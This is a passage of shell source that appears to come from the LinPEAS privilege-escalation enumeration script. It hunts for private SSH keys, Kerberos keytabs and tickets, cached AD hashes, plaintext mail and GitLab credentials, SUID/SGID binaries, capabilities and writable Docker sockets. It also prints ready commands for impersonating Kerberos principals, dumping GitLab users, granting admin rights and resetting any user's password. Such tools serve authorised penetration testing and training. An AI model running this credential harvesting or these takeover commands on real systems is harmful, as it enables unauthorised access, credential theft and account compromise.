PRIVATE KEY.*\-\-\-\-\-' $HOMESEARCH 2>/dev/null) - privatekeyfilesroot=$(timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /root 2>/dev/null) - privatekeyfilesmnt=$(timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /mnt 2>/dev/null) - else - privatekeyfilesetc=$(grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /etc 2>/dev/null) #If there is tons of files linpeas gets frozen here without a timeout - privatekeyfileshome=$(grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' $HOME/.ssh 2>/dev/null) - fi - - if [ "$privatekeyfilesetc" ] || [ "$privatekeyfileshome" ] || [ "$privatekeyfilesroot" ] || [ "$privatekeyfilesmnt" ] ; then - echo "" - print_3title "Possible private SSH keys were found!" | sed -${E} "s,private SSH keys,${SED_RED}," - if [ "$privatekeyfilesetc" ]; then printf "$privatekeyfilesetc\n" | sed -${E} "s,.*,${SED_RED},"; fi - if [ "$privatekeyfileshome" ]; then printf "$privatekeyfileshome\n" | sed -${E} "s,.*,${SED_RED},"; fi - if [ "$privatekeyfilesroot" ]; then printf "$privatekeyfilesroot\n" | sed -${E} "s,.*,${SED_RED},"; fi - if [ "$privatekeyfilesmnt" ]; then printf "$privatekeyfilesmnt\n" | sed -${E} "s,.*,${SED_RED},"; fi - echo "" - fi - if [ "$certsb4_grep" ] || [ "$PSTORAGE_CERTSBIN" ]; then - print_3title "Some certificates were found (out limited):" - printf "$certsb4_grep\n" | head -n 20 - printf "$$PSTORAGE_CERTSBIN\n" | head -n 20 - echo "" - fi - if [ "$PSTORAGE_CERTSCLIENT" ]; then - print_3title "Some client certificates were found:" - printf "$PSTORAGE_CERTSCLIENT\n" - echo "" - fi - if [ "$PSTORAGE_SSH_AGENTS" ]; then - print_3title "Some SSH Agent files were found:" - printf "$PSTORAGE_SSH_AGENTS\n" - echo "" - fi - if ssh-add -l 2>/dev/null | grep -qv 'no identities'; then - print_3title "Listing SSH Agents" - ssh-add -l - echo "" - fi - if [ "$PSTORAGE_SSH_CONFIG" ]; then - print_3title "Some home ssh config file was found" - printf "%s\n" "$PSTORAGE_SSH_CONFIG" | while read f; do ls "$f" | sed -${E} "s,$f,${SED_RED},"; cat "$f" 2>/dev/null | grep -Iv "^$" | grep -v "^#" | sed -${E} "s,User|ProxyCommand,${SED_RED},"; done - echo "" - fi - if [ "$hostsdenied" ]; then - print_3title "/etc/hosts.denied file found, read the rules:" - printf "$hostsdenied\n" - cat "/etc/hosts.denied" 2>/dev/null | grep -v "#" | grep -Iv "^$" | sed -${E} "s,.*,${SED_GREEN}," - echo "" - fi - if [ "$hostsallow" ]; then - print_3title "/etc/hosts.allow file found, trying to read the rules:" - printf "$hostsallow\n" - cat "/etc/hosts.allow" 2>/dev/null | grep -v "#" | grep -Iv "^$" | sed -${E} "s,.*,${SED_RED}," - echo "" - fi - if [ "$sshconfig" ]; then - echo "" - echo "Searching inside /etc/ssh/ssh_config for interesting info" - grep -v "^#" /etc/ssh/ssh_config 2>/dev/null | grep -Ev "\W+\#|^#" 2>/dev/null | grep -Iv "^$" | sed -${E} "s,Host|ForwardAgent|User|ProxyCommand,${SED_RED}," - fi - echo "" - - #-- SI) PAM auth - print_2title "Searching unexpected auth lines in /etc/pam.d/sshd" - pamssh=$(grep -v "^#\|^@" /etc/pam.d/sshd 2>/dev/null | grep -i auth) - if [ "$pamssh" ]; then - grep -v "^#\|^@" /etc/pam.d/sshd 2>/dev/null | grep -i auth | sed -${E} "s,.*,${SED_RED}," - else echo_no - fi - echo "" - - #-- SI) NFS exports - print_2title "NFS exports?" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation/nfs-no_root_squash-misconfiguration-pe" - if [ "$(cat /etc/exports 2>/dev/null)" ]; then grep -v "^#" /etc/exports 2>/dev/null | grep -Ev "\W+\#|^#" 2>/dev/null | sed -${E} "s,no_root_squash|no_all_squash ,${SED_RED_YELLOW}," | sed -${E} "s,insecure,${SED_RED}," - else echo_not_found "/etc/exports" - fi - echo "" - - #-- SI) Kerberos - print_2title "Searching kerberos conf files and tickets" - print_info "http://book.hacktricks.xyz/linux-unix/privilege-escalation/linux-active-directory" - kadmin_exists="$(command -v kadmin)" - klist_exists="$(command -v klist)" - if [ "$kadmin_exists" ]; then echo "kadmin was found on $kadmin_exists" | sed "s,$kadmin_exists,${SED_RED},"; fi - if [ "$klist_exists" ] && [ -x "$klist_exists" ]; then echo "klist execution"; klist; fi - ptrace_scope="$(cat /proc/sys/kernel/yama/ptrace_scope 2>/dev/null)" - if [ "$ptrace_scope" ] && [ "$ptrace_scope" -eq 0 ]; then echo "ptrace protection is disabled (0), you might find tickets inside processes memory" | sed "s,is disabled,${SED_RED},g"; - else echo "ptrace protection is enabled ($ptrace_scope), you need to disable it to search for tickets inside processes memory" | sed "s,is enabled,${SED_GREEN},g"; - fi - - printf "%s\n" "$PSTORAGE_KERBEROS" | while read f; do - if [ -r "$f" ]; then - if echo "$f" | grep -q .k5login; then - echo ".k5login file (users with access to the user who has this file in his home)" - cat "$f" 2>/dev/null | sed -${E} "s,.*,${SED_RED},g" - elif echo "$f" | grep -q keytab; then - echo "" - echo "keytab file found, you may be able to impersonate some kerberos principals and add users or modify passwords" - klist -k "$f" 2>/dev/null | sed -${E} "s,.*,${SED_RED},g" - printf "$(klist -k $f 2>/dev/null)\n" | awk '{print $2}' | while read l; do - if [ "$l" ] && echo "$l" | grep -q "@"; then - printf "$ITALIC --- Impersonation command: ${NC}kadmin -k -t /etc/krb5.keytab -p \"$l\"\n" | sed -${E} "s,$l,${SED_RED},g" - #kadmin -k -t /etc/krb5.keytab -p "$l" -q getprivs 2>/dev/null #This should show the permissions of each impersoanted user, the thing is that in a test it showed that every user had the same permissions (even if they didn't). So this test isn't valid - #We could also try to create a new user or modify a password, but I'm not user if linpeas should do that - fi - done - elif echo "$f" | grep -q krb5.conf; then - ls -l "$f" - cat "$f" 2>/dev/null | sed -${E} "s,default_ccache_name,${SED_RED},"; - elif echo "$f" | grep -q kadm5.acl; then - ls -l "$f" - cat "$f" 2>/dev/null - elif echo "$f" | grep -q sssd.conf; then - ls -l "$f" - cat "$f" 2>/dev/null | sed -${E} "s,cache_credentials ?= ?[tT][rR][uU][eE],${SED_RED},"; - elif echo "$f" | grep -q secrets.ldb; then - echo "You could use SSSDKCMExtractor to extract the tickets stored here" | sed -${E} "s,SSSDKCMExtractor,${SED_RED},"; - ls -l "$f" - elif echo "$f" | grep -q .secrets.mkey; then - echo "This is the secrets file to use with SSSDKCMExtractor" | sed -${E} "s,SSSDKCMExtractor,${SED_RED},"; - ls -l "$f" - fi - fi - done - ls -l "/tmp/krb5cc*" "/var/lib/sss/db/ccache_*" "/etc/opt/quest/vas/host.keytab" 2>/dev/null || echo_not_found "tickets kerberos" - klist 2>/dev/null || echo_not_found "klist" - echo "" - - peass{Knockd} - - peass{Kibana} - - peass{Elasticsearch} - - ##-- SI) Logstash - print_2title "Searching logstash files" - if [ "$PSTORAGE_LOGSTASH" ]; then - printf "$PSTORAGE_LOGSTASH\n" - printf "%s\n" "$PSTORAGE_LOGSTASH" | while read d; do - if [ -r "$d/startup.options" ]; then - echo "Logstash is running as user:" - cat "$d/startup.options" 2>/dev/null | grep "LS_USER\|LS_GROUP" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed -${E} "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,root,${SED_RED}," - fi - cat "$d/conf.d/out*" | grep "exec\s*{\|command\s*=>" | sed -${E} "s,exec\W*\{|command\W*=>,${SED_RED}," - cat "$d/conf.d/filt*" | grep "path\s*=>\|code\s*=>\|ruby\s*{" | sed -${E} "s,path\W*=>|code\W*=>|ruby\W*\{,${SED_RED}," - done - else echo_not_found - fi - echo "" - - #-- SI) Vault-ssh - print_2title "Searching Vault-ssh files" - if [ "$PSTORAGE_VAULT_SSH_HELPER" ]; then - printf "$PSTORAGE_VAULT_SSH_HELPER\n" - printf "%s\n" "$PSTORAGE_VAULT_SSH_HELPER" | while read f; do cat "$f" 2>/dev/null; vault-ssh-helper -verify-only -config "$f" 2>/dev/null; done - echo "" - vault secrets list 2>/dev/null - printf "%s\n" "$PSTORAGE_VAULT_SSH_TOKEN" | sed -${E} "s,.*,${SED_RED}," 2>/dev/null - else echo_not_found "vault-ssh-helper.hcl" - fi - echo "" - - #-- SI) Cached AD Hashes - adhashes=$(ls "/var/lib/samba/private/secrets.tdb" "/var/lib/samba/passdb.tdb" "/var/opt/quest/vas/authcache/vas_auth.vdb" "/var/lib/sss/db/cache_*" 2>/dev/null) - print_2title "Searching AD cached hashes" - if [ "$adhashes" ]; then - ls -l "/var/lib/samba/private/secrets.tdb" "/var/lib/samba/passdb.tdb" "/var/opt/quest/vas/authcache/vas_auth.vdb" "/var/lib/sss/db/cache_*" 2>/dev/null - else echo_not_found "cached hashes" - fi - echo "" - - #-- SI) Screen sessions - print_2title "Searching screen sessions" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-shell-sessions" - screensess=$(screen -ls 2>/dev/null) - if [ "$screensess" ]; then - printf "$screensess" | sed -${E} "s,.*,${SED_RED}," | sed -${E} "s,No Sockets found.*,${C}[32m&${C}[0m," - else echo_not_found "screen" - fi - echo "" - - #-- SI) Tmux sessions - tmuxdefsess=$(tmux ls 2>/dev/null) - tmuxnondefsess=$(ps auxwww | grep "tmux " | grep -v grep) - print_2title "Searching tmux sessions"$N - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-shell-sessions" - if [ "$tmuxdefsess" ] || [ "$tmuxnondefsess" ]; then - printf "$tmuxdefsess\n$tmuxnondefsess\n" | sed -${E} "s,.*,${SED_RED}," | sed -${E} "s,no server running on.*,${C}[32m&${C}[0m," - else echo_not_found "tmux" - fi - echo "" - - peass{CouchDB} - - peass{Redis} - - #-- SI) Dovecot - # Needs testing - print_2title "Searching dovecot files" - dovecotpass=$(grep -r "PLAIN" /etc/dovecot 2>/dev/null) - if [ -z "$dovecotpass" ]; then - echo_not_found "dovecot credentials" - else - for d in $(grep -r "PLAIN" /etc/dovecot 2>/dev/null); do - df=$(echo $d |cut -d ':' -f1) - dp=$(echo $d |cut -d ':' -f2-) - echo "Found possible PLAIN text creds in $df" - echo "$dp" | sed -${E} "s,.*,${SED_RED}," 2>/dev/null - done - fi - echo "" - - peass{Mosquitto} - - peass{Neo4j} - - peass{Cloud Credentials} - - peass{Cloud Init} - - peass{CloudFlare} - - peass{Erlang} - - peass{GMV Auth} - - peass{IPSec} - - peass{IRSSI} - - peass{Keyring} - - peass{Filezilla} - - peass{Backup Manager} - - ##-- SI) passwd files (splunk) - print_2title "Searching uncommon passwd files (splunk)" - SPLUNK_BIN="$(command -v splunk 2>/dev/null)" - if [ "$SPLUNK_BIN" ]; then echo "splunk binary was found installed on $SPLUNK_BIN" | sed "s,.*,${SED_RED},"; fi - printf "%s\n" "$PSTORAGE_SPLUNK" | sort | uniq | while read f; do - if [ -f "$f" ] && ! [ -x "$f" ]; then - echo "passwd file: $f" | sed "s,$f,${SED_RED}," - cat "$f" 2>/dev/null | grep "'pass'|'password'|'user'|'database'|'host'|\$" | sed -${E} "s,password|pass|user|database|host|\$,${SED_RED}," - fi - done - echo "" - - print_2title "Analyzing kcpassword files" - print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#kcpassword" - printf "%s\n" "$PSTORAGE_KCPASSWORD\n" | while read f; do - echo "$f" | sed -${E} "s,.*,${SED_RED}," - base64 "$f" 2>/dev/null | sed -${E} "s,.*,${SED_RED}," - done - echo "" - - ##-- SI) Gitlab - print_2title "Searching GitLab related files" - #Check gitlab-rails - if [ "$(command -v gitlab-rails)" ]; then - echo "gitlab-rails was found. Trying to dump users..." - gitlab-rails runner 'User.where.not(username: "peasssssssss").each { |u| pp u.attributes }' | sed -${E} "s,email|password,${SED_RED}," - echo "If you have enough privileges, you can make an account under your control administrator by running: gitlab-rails runner 'user = User.find_by(email: \"youruser@example.com\"); user.admin = TRUE; user.save!'" - echo "Alternatively, you could change the password of any user by running: gitlab-rails runner 'user = User.find_by(email: \"admin@example.com\"); user.password = \"pass_peass_pass\"; user.password_confirmation = \"pass_peass_pass\"; user.save!'" - echo "" - fi - if [ "$(command -v gitlab-backup)" ]; then - echo "If you have enough privileges, you can create a backup of all the repositories inside gitlab using 'gitlab-backup create'" - echo "Then you can get the plain-text with something like 'git clone \@hashed/19/23/14348274[...]38749234.bundle'" - echo "" - fi - #Check gitlab files - printf "%s\n" "$PSTORAGE_GITLAB" | sort | uniq | while read f; do - if echo $f | grep -q secrets.yml; then - echo "Found $f" | sed "s,$f,${SED_RED}," - cat "$f" 2>/dev/null | grep -Iv "^$" | grep -v "^#" - elif echo $f | grep -q gitlab.yml; then - echo "Found $f" | sed "s,$f,${SED_RED}," - cat "$f" | grep -A 4 "repositories:" - elif echo $f | grep -q gitlab.rb; then - echo "Found $f" | sed "s,$f,${SED_RED}," - cat "$f" | grep -Iv "^$" | grep -v "^#" | sed -${E} "s,email|user|password,${SED_RED}," - fi - echo "" - done - echo "" - - peass{Github} - - peass{Svn} - - peass{PGP-GPG} - - peass{Cache Vi} - - peass{Wget} - - ##-- SI) containerd installed - print_2title "Checking if containerd(ctr) is available" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation/containerd-ctr-privilege-escalation" - containerd=$(command -v ctr) - if [ "$containerd" ]; then - echo "ctr was found in $containerd, you may be able to escalate privileges with it" | sed -${E} "s,.*,${SED_RED}," - ctr image list - fi - echo "" - - ##-- SI) runc installed - print_2title "Checking if runc is available" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation/runc-privilege-escalation" - runc=$(command -v runc) - if [ "$runc" ]; then - echo "runc was found in $runc, you may be able to escalate privileges with it" | sed -${E} "s,.*,${SED_RED}," - fi - echo "" - - #-- SI) Docker - print_2title "Searching docker files (limit 70)" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-docker-socket" - printf "%s\n" "$PSTORAGE_DOCKER" | head -n 70 | while read f; do - ls -l "$f" 2>/dev/null - if ! [ "$IAMROOT" ] && [ -S "$f" ] && [ -w "$f" ]; then - echo "Docker socket file ($f) is writable" | sed -${E} "s,.*,${SED_RED_YELLOW}," - fi - done - echo "" - - peass{Firefox} - - peass{Chrome} - - peass{Autologin} - - #-- SI) S/Key athentication - print_2title "S/Key authentication" - if grep auth= /etc/login.conf 2>/dev/null | grep -v \"^#\" | grep -q skey; then - printf "System supports$RED S/Key$NC authentication\n" - if ! [ -d /etc/skey/ ]; then - echo "${GREEN}S/Key authentication enabled, but has not been initialized" - elif ! [ "$IAMROOT" ] && [ -w /etc/skey/ ]; then - echo "${RED}/etc/skey/ is writable by you" - ls -ld /etc/skey/ - else - ls -ld /etc/skey/ 2>/dev/null - fi - fi - echo "" - - #-- SI) YubiKey athentication - print_2title "YubiKey authentication" - if grep auth= /etc/login.conf 2>/dev/null | grep -v \"^#\" | grep -q yubikey; then - printf "System supports$RED YubiKey$NC authentication\n" - if ! [ "$IAMROOT" ] && [ -w /var/db/yubikey/ ]; then - echo "${RED}/var/db/yubikey/ is writable by you" - ls -ld /var/db/yubikey/ - else - ls -ld /var/db/yubikey/ 2>/dev/null - fi - fi - echo "" - - #-- SI) Passwords inside pam.d - print_2title "Passwords inside pam.d" - grep -Ri "passwd" /etc/pam.d/ 2>/dev/null | grep -v ":#" | sed "s,passwd,${SED_RED}," - echo "" - - - - peass{SNMP} - - peass{Pypirc} - - peass{Postfix} - - peass{Ldaprc} - - peass{Env} - - peass{Msmtprc} - - peass{Keepass} - - peass{FTP} - - peass{EXTRA_SECTIONS} - - peass{Interesting logs} - - peass{Windows Files} - - peass{Other Interesting Files} - - echo "" - - if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi -fi - - -if echo $CHECKS | grep -q IntFiles; then - ########################################### - #----------) Interesting files (----------# - ########################################### - print_title "Interesting Files" - - ##-- IF) SUID - print_2title "SUID - Check easy privesc, exploits and write perms" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid" - if ! [ "$STRINGS" ]; then - echo_not_found "strings" - fi - if ! [ "$STRACE" ]; then - echo_not_found "strace" - fi - suids_files=$(find / -perm -4000 -type f ! -path "/dev/*" 2>/dev/null) - for s in $suids_files; do - s=$(ls -lahtr "$s") - #If starts like "total 332K" then no SUID bin was found and xargs just executed "ls" in the current folder - if echo "$s" | grep -qE "^total"; then break; fi - - sname="$(echo $s | awk '{print $9}')" - if [ "$sname" = "." ] || [ "$sname" = ".." ]; then - true #Don't do nothing - elif ! [ "$IAMROOT" ] && [ -O "$sname" ]; then - echo "You own the SUID file: $sname" | sed -${E} "s,.*,${SED_RED}," - elif ! [ "$IAMROOT" ] && [ -w "$sname" ]; then #If write permision, win found (no check exploits) - echo "You can write SUID file: $sname" | sed -${E} "s,.*,${SED_RED_YELLOW}," - else - c="a" - for b in $sidB; do - if echo $s | grep -q $(echo $b | cut -d % -f 1); then - echo "$s" | sed -${E} "s,$(echo $b | cut -d % -f 1),${C}[1;31m& ---> $(echo $b | cut -d % -f 2)${C}[0m," - c="" - break; - fi - done; - if [ "$c" ]; then - if echo "$s" | grep -qE "$sidG1" || echo "$s" | grep -qE "$sidG2" || echo "$s" | grep -qE "$sidG3" || echo "$s" | grep -qE "$sidG4" || echo "$s" | grep -qE "$sidVB" || echo "$s" | grep -qE "$sidVB2"; then - echo "$s" | sed -${E} "s,$sidG1,${SED_GREEN}," | sed -${E} "s,$sidG2,${SED_GREEN}," | sed -${E} "s,$sidG3,${SED_GREEN}," | sed -${E} "s,$sidG4,${SED_GREEN}," | sed -${E} "s,$sidVB,${SED_RED_YELLOW}," | sed -${E} "s,$sidVB2,${SED_RED_YELLOW}," - else - echo "$s (Unknown SUID binary)" | sed -${E} "s,/.*,${SED_RED}," - printf $ITALIC - if ! [ "$FAST" ] && [ "$STRINGS" ]; then - $STRINGS "$sname" 2>/dev/null | sort | uniq | while read sline; do - sline_first="$(echo "$sline" | cut -d ' ' -f1)" - if echo "$sline_first" | grep -qEv "$cfuncs"; then - if echo "$sline_first" | grep -q "/" && [ -f "$sline_first" ]; then #If a path - if [ -O "$sline_first" ] || [ -w "$sline_first" ]; then #And modifiable - printf "$ITALIC --- It looks like $RED$sname$NC$ITALIC is using $RED$sline_first$NC$ITALIC and you can modify it (strings line: $sline) (https://tinyurl.com/suidpath)\n" - fi - else #If not a path - if [ ${#sline_first} -gt 2 ] && command -v "$sline_first" 2>/dev/null | grep -q '/' && echo "$sline_first" | grep -Eqv "\.\."; then #Check if existing binary - printf "$ITALIC --- It looks like $RED$sname$NC$ITALIC is executing $RED$sline_first$NC$ITALIC and you can impersonate it (strings line: $sline) (https://tinyurl.com/suidpath)\n" - fi - fi - fi - done - if ! [ "$FAST" ] && [ "$TIMEOUT" ] && [ "$STRACE" ] && ! [ "$NOTEXPORT" ] && [ -x "$sname" ]; then - printf $ITALIC - echo "----------------------------------------------------------------------------------------" - echo " --- Trying to execute $sname with strace in order to look for hijackable libraries..." - OLD_LD_LIBRARY_PATH=$LD_LIBRARY_PATH - export LD_LIBRARY_PATH="" - timeout 2 "$STRACE" "$sname" 2>&1 | grep -i -E "open|access|no such file" | sed -${E} "s,open|access|No such file,${SED_RED}$ITALIC,g" - printf $NC - export LD_LIBRARY_PATH=$OLD_LD_LIBRARY_PATH - echo "----------------------------------------------------------------------------------------" - echo "" - fi - fi - fi - fi - fi - done; - echo "" - - - ##-- IF) SGID - print_2title "SGID" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid" - sgids_files=$(find / -perm -2000 -type f ! -path "/dev/*" 2>/dev/null) - for s in $sgids_files; do - s=$(ls -lahtr "$s") - #If starts like "total 332K" then no SUID bin was found and xargs just executed "ls" in the current folder - if echo "$s" | grep -qE "^total";then break; fi - - sname="$(echo $s | awk '{print $9}')" - if [ "$sname" = "." ] || [ "$sname" = ".." ]; then - true #Don't do nothing - elif ! [ "$IAMROOT" ] && [ -O "$sname" ]; then - echo "You own the SGID file: $sname" | sed -${E} "s,.*,${SED_RED}," - elif ! [ "$IAMROOT" ] && [ -w "$sname" ]; then #If write permision, win found (no check exploits) - echo "You can write SGID file: $sname" | sed -${E} "s,.*,${SED_RED_YELLOW}," - else - c="a" - for b in $sidB; do - if echo "$s" | grep -q $(echo $b | cut -d % -f 1); then - echo "$s" | sed -${E} "s,$(echo $b | cut -d % -f 1),${C}[1;31m& ---> $(echo $b | cut -d % -f 2)${C}[0m," - c="" - break; - fi - done; - if [ "$c" ]; then - if echo "$s" | grep -qE "$sidG1" || echo "$s" | grep -qE "$sidG2" || echo "$s" | grep -qE "$sidG3" || echo "$s" | grep -qE "$sidG4" || echo "$s" | grep -qE "$sidVB" || echo "$s" | grep -qE "$sidVB2"; then - echo "$s" | sed -${E} "s,$sidG1,${SED_GREEN}," | sed -${E} "s,$sidG2,${SED_GREEN}," | sed -${E} "s,$sidG3,${SED_GREEN}," | sed -${E} "s,$sidG4,${SED_GREEN}," | sed -${E} "s,$sidVB,${SED_RED_YELLOW}," | sed -${E} "s,$sidVB2,${SED_RED_YELLOW}," - else - echo "$s (Unknown SGID binary)" | sed -${E} "s,/.*,${SED_RED}," - printf $ITALIC - if ! [ "$FAST" ] && [ "$STRINGS" ]; then - $STRINGS "$sname" | sort | uniq | while read sline; do - sline_first="$(echo $sline | cut -d ' ' -f1)" - if echo "$sline_first" | grep -qEv "$cfuncs"; then - if echo "$sline_first" | grep -q "/" && [ -f "$sline_first" ]; then #If a path - if [ -O "$sline_first" ] || [ -w "$sline_first" ]; then #And modifiable - printf "$ITALIC --- It looks like $RED$sname$NC$ITALIC is using $RED$sline_first$NC$ITALIC and you can modify it (strings line: $sline)\n" - fi - else #If not a path - if [ ${#sline_first} -gt 2 ] && command -v "$sline_first" 2>/dev/null | grep -q '/'; then #Check if existing binary - printf "$ITALIC --- It looks like $RED$sname$NC$ITALIC is executing $RED$sline_first$NC$ITALIC and you can impersonate it (strings line: $sline)\n" - fi - fi - fi - done - if ! [ "$FAST" ] && [ "$TIMEOUT" ] && [ "$STRACE" ] && [ ! "$SUPERFAST" ]; then - printf "$ITALIC" - echo " --- Trying to execute $sname with strace in order to look for hijackable libraries..." - timeout 2 "$STRACE" "$sname" 2>&1 | grep -i -E "open|access|no such file" | sed -${E} "s,open|access|No such file,${SED_RED}$ITALIC,g" - printf "$NC" - echo "" - fi - fi - fi - fi - fi - done; - echo "" - - ##-- IF) Misconfigured ld.so - print_2title "Checking misconfigurations of ld.so" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#ld-so" - printf $ITALIC"/etc/ld.so.conf\n"$NC; - cat /etc/ld.so.conf 2>/dev/null | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" - cat /etc/ld.so.conf 2>/dev/null | while read l; do - if echo "$l" | grep -q include; then - ini_path=$(echo "$l" | cut -d " " -f 2) - fpath=$(dirname "$ini_path") - if [ "$(find $fpath -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find $fpath -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - printf $ITALIC"$fpath\n"$NC | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" - for f in $fpath/*; do - printf $ITALIC" $f\n"$NC | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" - cat "$f" | grep -v "^#" | sed -${E} "s,$ldsoconfdG,${SED_GREEN}," | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" - done - fi - done - echo "" - - ##-- IF) Capabilities - print_2title "Capabilities" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#capabilities" - echo "Current capabilities:" - (capsh --print 2>/dev/null | grep "Current:" | sed -${E} "s,$capsB,${SED_RED_YELLOW}," ) || echo_not_found "capsh" - (cat "/proc/$$/status" | grep Cap | sed -${E} "s,.*0000000000000000|CapBnd: 0000003fffffffff,${SED_GREEN},") 2>/dev/null || echo_not_found "/proc/$$/status" - echo "" - echo "Shell capabilities:" - (capsh --decode=0x"$(cat /proc/$PPID/status 2>/dev/null | grep CapEff | awk '{print $2}')" 2>/dev/null) || echo_not_found "capsh" - (cat "/proc/$PPID/status" | grep Cap | sed -${E} "s,.*0000000000000000|CapBnd: 0000003fffffffff,${SED_GREEN},") 2>/dev/null || echo_not_found "/proc/$PPID/status" - echo "" - echo "Files with capabilities (limited to 50):" - getcap -r / 2>/dev/null | head -n 50 | while read cb; do - capsVB_vuln="" - - for capVB in $capsVB; do - capname="$(echo $capVB | cut -d ':' -f 1)" - capbins="$(echo $capVB | cut -d ':' -f 2)" - if [ "$(echo $cb | grep -Ei $capname)" ] && [ "$(echo $cb | grep -E $capbins)" ]; then - echo "$cb" | sed -${E} "s,.*,${SED_RED_YELLOW}," - capsVB_vuln="1" - break - fi - done - - if ! [ "$capsVB_vuln" ]; then - echo "$cb" | sed -${E} "s,$capsB,${SED_RED}," - fi - - if ! [ "$IAMROOT" ] && [ -w "$(echo $cb | cut -d" " -f1)" ]; then - echo "$cb is writable" | sed -${E} "s,.*,${SED_RED}," - fi - done - echo "" - - ##-- IF) Users with capabilities - print_2title "Users with capabilities" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#capabilities" - if [ -f "/etc/security/capability.conf" ]; then - grep -v '^#\|none\|^$' /etc/security/capability.conf 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED}," - else echo_not_found "/etc/security/capability.conf" - fi - echo "" - - ##-- IF) Files with ACLs - print_2title "Files with ACLs (limited to 50)" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#acls" - ( (getfacl -t -s -R -p /bin /etc $HOMESEARCH /opt /sbin /usr /tmp /root 2>/dev/null) || echo_not_found "files with acls in searched folders" ) | head -n 70 | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED}," - - if [ "$MACPEAS" ] && ! [ "$FAST" ] && ! [ "$SUPERFAST" ] && ! [ "$(command -v getfacl)" ]; then #Find ACL files in macos (veeeery slow) - ls -RAle / 2>/dev/null | grep -v "group:everyone deny delete" | grep -E -B1 "\d: " | head -n 70 | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED}," - fi - echo "" - - ##-- IF) Files with ResourceFork - #if [ "$MACPEAS" ] && ! [ "$FAST" ] && ! [ "$SUPERFAST" ]; then # TOO SLOW, CHECK IT LATER - # print_2title "Files with ResourceFork" - # print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#resource-forks-or-macos-ads" - # find $HOMESEARCH -type f -exec ls -ld {} \; 2>/dev/null | grep -E ' [x\-]@ ' | awk '{printf $9; printf "\n"}' | xargs -I {} xattr -lv {} | grep "com.apple.ResourceFork" - #fi - #echo "" - - ##-- IF) .sh files in PATH - print_2title ".sh files in path" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#script-binaries-in-path" - echo $PATH | tr ":" "\n" | while read d; do - for f in $(find "$d" -name "*.sh" 2>/dev/null); do - if ! [ "$IAMROOT" ] && [ -O "$f" ]; then - echo "You own the script: $f" | sed -${E} "s,.*,${SED_RED}," - elif ! [ "$IAMROOT" ] && [ -w "$f" ]; then #If write permision, win found (no check exploits) - echo "You can write script: $f" | sed -${E} "s,.*,${SED_RED_YELLOW}," - else - echo $f | sed -${E} "s,$shscripsG,${SED_GREEN}," | sed -${E} "s,$Wfolders,${SED_RED},"; - fi - done - done - echo "" - - print_2title "Broken links in path" - echo $PATH | tr ":" "\n" | while read d; do - find "$d" -type l 2>/dev/null | xargs file 2>/dev/null | grep broken | sed -${E} "s,broken,${SED_RED},"; - done - echo "" - - - if [ "$MACPEAS" ]; then - print_2title "Unsigned Applications" - macosNotSigned /System/Applications - fi - - ##-- IF) Unexpected folders in / - print_2title "Unexpected in root" - if [ "$MACPEAS" ]; then - (find / -maxdepth 1 | grep -Ev "$commonrootdirsMacG" | sed -${E} "s,.*,${SED_RED},") || echo_not_found - else - (find / -maxdepth 1 | grep -Ev "$commonrootdirsG" | sed -${E} "s,.*,${SED_RED},") || echo_not_found - fi - echo "" - - ##-- IF) Files (scripts) in /etc/profile.d/ - print_2title "Files (scripts) in /etc/profile.d/" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#profiles-files" - if [ ! "$MACPEAS" ]; then #Those folders don´t exist on a MacOS - (ls -la /etc/profile.d/ 2>/dev/null | sed -${E} "s,$profiledG,${SED_GREEN},") || echo_not_found "/etc/profile.d/" - if ! [ "$IAMROOT" ] && [ -w "/etc/profile" ]; then echo "You can modify /etc/profile" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if ! [ "$IAMROOT" ] && [ -w 